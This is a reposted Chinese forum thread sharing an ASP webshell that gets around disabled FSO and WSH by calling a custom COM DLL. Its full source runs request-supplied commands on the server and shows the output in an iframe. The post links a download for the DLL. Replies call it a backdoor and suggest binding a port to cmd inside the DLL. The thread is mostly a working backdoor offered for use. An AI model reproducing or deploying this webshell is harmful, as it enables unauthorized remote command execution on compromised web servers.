[转载]一个不用FSO和WSH支持的ASP木马
文章作者:kevin1986界面很简单,差不多类似古老的cmd.asp.只是做抛砖引玉的东西
写好后~自己看了都高兴~~西西~用的是VB的SHELL函数!
其实这个东西唯一的好处就是在有的机器上禁止了FSO和WSH之后也能够运行。
原理是先产生一个DLL对象,然后用ASP去调用这个对象中的EXEC函数,这样就可以得到命令了。然后执行输出到网页所在的目录下的ZZ.TXT中,页面中用IFRAME读取~~但是需要手动刷新一下,毕竟SHELL执行是异步的。。。。
PS:kevinz.dll需要和SHELL.ASP放在一起才能使用或者将SHELL.ASP放到SYSTEM32目录下
代码如下:
<%
dim shell
set shell=server.createobject("kevinz.exec")
path=server.mappath(".")
response.write "<font color=blue size=2>Now system Path is:<br><br>"&path&"<br></font><hr color=red>"
if not request("cmd")="" then
cmd=request("cmd")
cmd=replace(cmd,"^","^^")
cmd=replace(cmd,">","^>")
cmd=replace(cmd,"<","^<")
cmd=replace(cmd,"&","^&")
shell.exec cmd,path
response.write "<br><font color=red size=2>Command:"""&cmd&"""<br>Command successfully executed<br></font>"
else
cmd="ver"
end if
set test=nothing
%>
<html>
<head><title>Kevin1986's she11 aspd00r</title>
</head>
<form name="kevinz" action="shell.asp">
<input type="text" name="cmd" value=<%=cmd%> size=60>
<input type="submit" value="eXe(u+e (0mm4nd">
<br>
<iframe height=60% width=80% src="zz.txt" name="result"></iframe><br>
<font size=2><a href=javascript:history.go(0) target="result">查看执行结果</a></font>
</body>
[url]http://www.lscrc.com/kevin/blog/attachments/month_0411/52s9_shell.rar[/url]
</html> </body>
[url]http://www.lscrc.com/kevin/blog/attachments/month_0411/52s9_shell.rar[/url]
</html>
代码里下载这个文件是什么意思?
是作者已经编写好的还是其他?? 恩...这个是好早以前的东西了吧...做后门可以,其他的应该不行.我自己也不用的了.....呵呵
下载只要下载其中的kevinZ.dll就可以了,注册之后直接搞定 我晕倒.难怪看server.createobject("kevinz.exec")怎么要用到COM组件的
如果都有了regsvr32的权限了.
还用再上传ASP木马么...
直接DLL里面写个后门好了.
ASP里面CREATE一下就OK了.
不用那么麻烦再绕圈子了. 呵呵,当初的目的就是写个后门而已 直接把要做的直接封装到DLL里面么.
否则现在这样还要另外在把要执行的cmd自己再输出到ASP.
再去调用DLL去调用exec去执行.
感觉已经有路了再绕开再绕回来的样子.
不如在DLL直接绑定个端口到CMD不是更直接么.
页:
[1]